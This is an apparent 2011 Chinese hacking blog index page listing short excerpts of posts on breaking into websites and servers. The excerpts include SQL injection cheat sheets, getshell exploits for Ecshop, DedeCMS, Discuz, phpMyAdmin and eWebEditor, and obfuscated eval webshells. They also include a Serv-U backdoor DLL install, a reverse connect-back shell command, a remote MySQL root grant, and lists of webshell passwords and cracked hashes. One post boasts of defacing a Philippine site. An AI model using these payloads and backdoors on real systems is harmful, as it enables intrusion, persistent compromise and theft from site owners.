自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

收集盒 Book box

大多数文章收集自互联网

  • 博客(33)
  • 资源 (1)
  • 收藏
  • 关注

原创 手工注入大全学习手册

<br /><br />手工注入大全<br />1.判断有无注入点<br />‘ ; and 1=1 and 1=2<br />2.猜表: 常见的表:admin adminuser user pass password 等..<br />and 0<>(select count(*) from *)<br />and 0<>(select count(*) from admin) —判断是否存在admin这张表<br />3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个<br

2011-03-31 23:18:00 659

原创 PHP168 V6.01/6.02权限提升及暴本地路径漏洞

<br /><br />摘要:发布日期:2010-12.15 发布作者:佚名 影响版本:PHP168 V6.01/6.02 官方网站:http://www.php168.net 漏洞类型:设计错误 漏洞描述:PHP168整站是PHP领域当前功能最强大的建站系统,代码全部开源,可极其方便的进行二次开发,所有功能模块可以自由安装与删...<br />发布日期:2010-12.15<br />发布作者:佚名<br />影响版本:PHP168 V6.01/6.02<br />官方网站:http://www.php1

2011-03-31 23:11:00 1006

原创 N点主机管理系统密码解密代码程序

<br />2010年12月20日 星期一 07:22<br /><br />之前有写过<N点主机管理系统漏洞利用与防御措>的文章,那个我感觉其实也不算是漏洞吧.<br />这次在发个N点主机管理系统的加密密码解密漏洞利用代码程序吧,呵呵.<br />首先得了解下N点主机管理系统的密码加密可并非是cmd5等加密方式加密的.<br />即使用<N点主机管理系统漏洞利用与防御措>里介绍的办法登陆了管理系统的后台也是拿不下服务器的.<br />在N点主机管理系统下想获得服务器的权限也就是利用数据库里保存的sa帐号

2011-03-31 23:10:00 1539

原创 DEDEcms GET shell 再次通杀 所有版本

<br />还是上次的那个dede getshell 漏洞 ,只不过官方的补丁没有补到位。<br /><br />现在其基础上,修改图片代码实现最新版本补丁突破。<br />找一张图片,在保留图片代码的同时,插入如下代码<br /><br />复制代码<br

2011-03-31 23:07:00 1058

原创 Ecshop 漏洞集合

Ecshop 漏洞集合一、EXP:search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWx

2011-03-31 23:06:00 3063

原创 Mssql Public权限列目录

<br />注入点执行<br />aaa.com/xxx.asp?id=123;create table %23%23dhtemq (list int not null identity (1,1), dirtree nvarchar(500),num1 nvarchar(500),num2 nvarchar(500))<br />注入点执行<br />aaa.com/xxx.asp?id=123;insert into %23%23dhtemq(dirtree,num1,num2) exec master

2011-03-31 22:56:00 694

原创 不改文件名的情况下上传突破

<br /><br />方法不错,首先就是不强制改上传文件名。还有就是上传目录没有执行的权限。<br />然后用这方法貌似就可以上传到上级可写目录了。<br />比如抓这是抓的上传数据包:<br />POST /upload/upfile.asp HTTP/1.1<br />Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,

2011-03-28 17:20:00 617

原创 freetextbox最新上传0day

<br /><br />freetextbox跟fckeditor多是国外的一款编辑器。用的还挺多的。<br />基于.NET。<br />漏洞描述:所有版本 没做登陆验证可以直接访问上传木马<br />Freetextbox 3-3-1 可以直接上传任意格式

2011-03-25 02:47:00 677

原创 菲律宾 IT安全网被黑

<br /><br />继上次总统通讯部被我黑,当时服务器的网管还来我的百度博客注册个账户在文章下评论骂我,这次又黑了IT安全网,哈哈!菲律宾本来就是SB,好舒畅啊~~~ ‍<br />http://www.it-security-online.ch<br /> <br />

2011-03-22 16:39:00 685

原创 收費MD5公布

MD:af1948f9e4261e44Result:1275116717MD:2a33182a0f6d3d1aResult:wxm850505MD:60e5eff90873642cResult:ssssssssMD:eb348d740d0339d7Result:feihua2008MD:4f96234819b6d9fbaa8a8b563048b3d7Result:96game789MD:eebc8d59ca5d5322Result:wyq200909199be8876ed7e1c005=rain060423

2011-03-21 12:59:00 832

原创 discuz x1.5 discuz 7.2 后台getshell 0day通杀版出来

<br />discuz x1.5 discuz 7.2 后台getshell 0day通杀版,不知海浪做好防御没有~~~<br /><br /><br />附上 <br />从Discuz!古老的6.0版本开始,漏洞都出现在扩展插件上,利用方式有所不同,下面开始。<br />一 Discuz! 6.0 和 Discuz! 7.0<br />既然要后台拿Shell,文件写入必看。<br />/include/cache.func.php<br /><br />往上翻,找到调用函数的地方.都在updateca

2011-03-20 21:16:00 2491

原创 mickey:搞内网最常用的工具整理

<br /><br /> <br />http://www.edge-security.com/soft/wfuzz-1.4b-win.tar.gz<br /> <br />http://nmap.org/dist/nmap-5.00-win32.zip<br /> <br />http://freeworld.thc.org/thc-hydra/hydra-5.4-win.zip<br /> <br />http://windowsaudit.com/downloads/WinScanX_Basic.zi

2011-03-19 16:07:00 632

原创 Serv-U BlackDoor [Version:6.4.x]

<br /><br /><br /><br /><br /><br />==================================<br />安装方法:<br />将DLL放到Serv-U 安装目录下.<br />打开安装目录下的: ServUDaemon.ini 文件,在最后部分加入3行:<br />[EXTERNAL]<br />ClientCheckDLL1=Serv-U.dll<br />EventHookDLL1=Serv-U.dll<br />=====================

2011-03-19 16:02:00 544

原创 变形aspwebshell & phpwebshell[Lcx]

<br /><br />asp版的,这是utf-8编码,自己看着弄吧<br /><%@LANGUAGE=”JAVASCRIPT” CODEPAGE=”65001″%><br /><%<br />var lcx = {‘名字’ : Request.form(‘#’), ‘性别’ : eval, ‘年龄’ : ‘18′, ‘昵称’ : ‘请叫我一声老大’};<br />lcx.性别((lcx.名字)+”);<br />%><br />用冰狐就行了<br /><?php<br />@preg_replace(“/

2011-03-19 15:59:00 1797

原创 反弹先锋Win32.ConnectBackShell

<br /><br />Connect back shell golds7n version<br />bc <ip> <port> [shell]<br /><br />用法:  bc   ip地址  端口   cmd路径(可选项)<br /><br />远程机器执行:<br />bc 10.10.88.88 21 c:/windows/system32/msdtc/cmd.exe<br /><br />本机:<br />C:/Documents and Settings/Administrator>nc

2011-03-19 15:37:00 626

原创 黑盒白盒测试工具

<br /><br />http://en.wikipedia.org/wiki/List_of_tools_for_static_code_analysis<br />C/C++<br />1、flawfinder<br />http://www.dwheeler.com/flawfinder/<br />2、Bunny the Fuzzer (fuzzer function)<br />http://code.google.com/p/bunny-the-fuzzer/wiki/BunnyDoc<br

2011-03-19 15:37:00 1235

原创 ASP .NET PHP 注入页面构造

<br /><br />Mssql:<br /><!--#include file="conn.asp"--> <br /><% <br />hid=request.QueryString("id") <br />sql="select * from admin where id="&hid <br />set rs=conn.execute (sql) <br />%><br />Access:<br /><% <br />db="aspzhuru.mdb"'这里修改数据库路径或名称 <br />Set

2011-03-19 15:16:00 441

原创 linux下用webshell修改文件权限

<br /><br />当我们拥有了一个linux下的shell(服务器上多个网站)。<br />这个shell对所在站点的根目录有可写入权限,甚至能查看其他网站的目录。<br />那么,这样的主机设置肯定是不安全的。<br />有的时候,我们想对获得同服务器的其他站的权限,比如直接对其他站点的index.php进行修改,却发现没有权限。<br />我们可以尝试通过以下脚本来实现对其他站点的文件添加权限。<br />代码:<br /><?php<br />$path = stripslashes($_GET

2011-03-19 15:15:00 657

原创 利用系统保留文件名创建无法删除的webshell

<br /><br />Windows 下不能够以下面这些字样来命名文件/文件夹,包括:“aux”,“com1”“com2”“prn”“con”和“nul”等,但是通过cmd下是可以创建此类文件夹的,使用copy命令即可实现:<br />D:/wwwroot>copy rootkit.asp //./D://wwwroot/aux.asp<br />已复制         1 个文件。<br /> <br />D:/wwwroot>dir<br /> 驱动器 D 中的卷没有标签。<br /> 卷的序列号是

2011-03-19 15:14:00 486

原创 获取IIS虚拟网站信息的工具

<br /><br />工具适用人群:获取服务器或webshell权限后,想知道服务器上到底有哪些虚拟网站,这些网站的域名什么,网站绑定的端口,该网站是否停用,网站的物理路径是什么,网站的有哪些虚拟目录,虚拟目录的名字和物理路径是什么<br />该工具并非完全原创,在前人的基础上,参照adsutil.vbs修改而成<br />使用说明:cscript GetWebinfo.vbs<br /><br />代码保存为GetWebinfo.vbs:<br />On Error Resume Next<br />W

2011-03-19 15:13:00 846

原创 linux下端口转发工具rinetd

<br /><br />端口转发映射的程序叫rinetd,启动方法rinetd -c /etc/rinetd.conf 。<br />把1.1.1.1的11端口映射到2.2.2.2的3389端口,配置文件如下<br />[root@localhost iso]# cat /etc/rinetd.conf<br />1.1.1.1 11 2.2.2.1 3389<br />1.1.1.1 12 2.2.2.2 3389<br />1.1.1.1 13 2.2.2.3 22<br />1.1.1.1 14 2.

2011-03-19 15:11:00 787

原创 《SQL Server Online Manager》SQL Server 在线管理

<br /><br />Modified By toby57<br />有时候需要在线管理SQLServer数据库,手上马儿自带的功能太不直观方便,于是在网上找到了BBSGOOD的mssql_online_v1.0beta,不过发现其文件过多,不方便上传,今天花点时间把功能都修改整合成了一个文件。<br /><br />代码如下(SQLServer.asp):<br /><%<br />if trim(request.Cookies("linkok"))<>"yes" then<br />if trim(r

2011-03-19 15:03:00 627

原创 很多黑阔的密码

<br /><br />组超强功能修正去后门加强S-U提权版                密码hkk007<br />火狐ASP木马(超强版)” 华夏五周年庆典版             密码wrsk<br />**(中国数据)                                                         密码rinima<br />asp    黑客→kissy                                                      密

2011-03-18 22:06:00 1288

原创 serv-u8 本地提权

<br /><br />受影响系统:serv-u8<br />不受影响系统:其他版本不受影响<br />描述:<br />看cnbeta发现su出8这个版本了。<br />想想以前写过一个7的本地提权。<br />不知道8有什么安全方面的更改。<br />下载来研究下,发现居然还是可以提权的,只是su7的那个不能直接用,稍微修改了下执行的流程。<br /> Su8的管理平台是http的,继承了su7的方式。<br /> 抓包,分析,发现了以下路程是可以利用的。<br /> 1, 管理员从管理控制台打开web

2011-03-17 19:09:00 789

原创 SQL注入eWebEditor数据库

<br /><br />条件:1、知道ewebeditor数据库的绝对地址<br />2、存在注入,或者后台可执行sql语句。<br />跨库注入:<br />update eWebEditor_Style in ‘E:/webhost/xxxxxxxx/www/admin/Ed

2011-03-17 19:03:00 610

原创 oldjun 检测网站的经验

<br /><br /> <br />1.无论什么站,无论什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,直接上传shell,诸位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点,而且很容易猜到,不过这种情况发生在asp居多!<br />2.asp(aspx)+MSSQL先考虑注入,一般的注入都有DBowner权限可以直接写shell;如果写不了,或者web与数据库分离,那就猜数据,从后台下手了,后台可以上传或者改配置文件;<br />3.asp(aspx)+ACCESS拿shell一

2011-03-14 17:49:00 655

原创 安全的使用带后门的webshell

<br /><br />在网上下的WEBSHELL几乎大部分存在后门。这样的话你辛辛苦苦拿下的站。同时也免费的送人了。<br />一般的人也很难解密。无法去除后门。现在给出一种最简单的方法。不要去除后门。照样用。放后门<br />者无法使用。当然要是WEBSHELL作者在里面放了万能密码的话。这招貌似无效。<br />万能密码也是本代码。呵。挺搞笑。<br />代码挺简单的。如下:<br />在webshell的最前面插入:<br /><%if request(“tmdsb”)=”250″ then %><

2011-03-12 00:31:00 882

原创 域渗透

很多时候我们在渗透的时候几乎都在内网旁注等xx操作,但是你知道吗,其实很多时候我们都进入了一个域,但你知道怎么进行域渗透吗?这里秒杀将为你科普下!首先还是先简要看一下域的概念吧:域 (Domain) 是Windows网络中独立运行的单位,域之间相互访问则需要建立信任关系(即Trust Relation)。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后,2个域之间不但可以按需要相互进行管理,还可以跨网分配文件 和打印机等设备资源,使不同的域之间实现网络资源的共享与管理。

2011-03-11 23:54:00 978

原创 arpsf 嗅探使用

<br /><br />================================================================================<br />                ArpCheatSniffer V1.0<br />                Powered by shadow @2005/5/8<br />                my web:http://www.codehome.6600.org<br />          

2011-03-11 23:45:00 1010

原创 PhpMyadmin最新拿WEBshell

<br /><br />在无权执行SQL命令导出一句话或者导出出错的情况下用它试试吧。<br />利用代码 :<br />http://www.tmdsb.com/phpMyAdmin/sql.php?db=test&table=<br />a&printview=1&sql_query=select%20cmd%20from+a%20into%20outfile<br />%20′E://test1.php’;&display_text=F&token=dc49fb24f86a6dc2b996b5d421

2011-03-11 23:41:00 675

原创 Mysql暴错注入代码

<br />MySql Error Based Injection Reference<br />[Mysql暴错注入参考]<br />Author:Pnig0s1992<br />Blog:http://pnig0s1992.blog.51cto.com/<br />TeAm:http://www.FreeBuf.com/<br />Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功<br />小部分版本使用name_const()时会报错.可以用给出的Method.2测试<br />查

2011-03-11 23:39:00 730

原创 开启mysql root外连

<br /><br />如果遇到了 服务器开启了 3306 端口,但是不允许root外连的情况,<br />我们可以在shell里面执行如下的语句来开启root用户的外连,方便我们提权。<br /> GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root密码' WITH GRANT OPTION;

2011-03-11 23:37:00 624

原创 ewebeditor 2.8 后台插马

<br /><br />ewebeditor 2.8 后台插上一句话<br />影响版本:2.8 商业版<br />攻击利用:登陆后台,点击修改密码—新密码设置为 1″:eval request(“a”)’<br />设置成功后,访问http://www.tmdsb.com/ewebeditor/asp/config.asp文件即可,<br />一句话木马被写入到这个文件里面了.

2011-03-11 23:32:00 708

青云服务器安全设置器V2011正式版

青云服务器安全设置器V2011正式版 官方下载地址是http://ntsafe.com/html/zhanchanggongju/chanpinruanjian/20110214/1516.html

2011-09-04

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除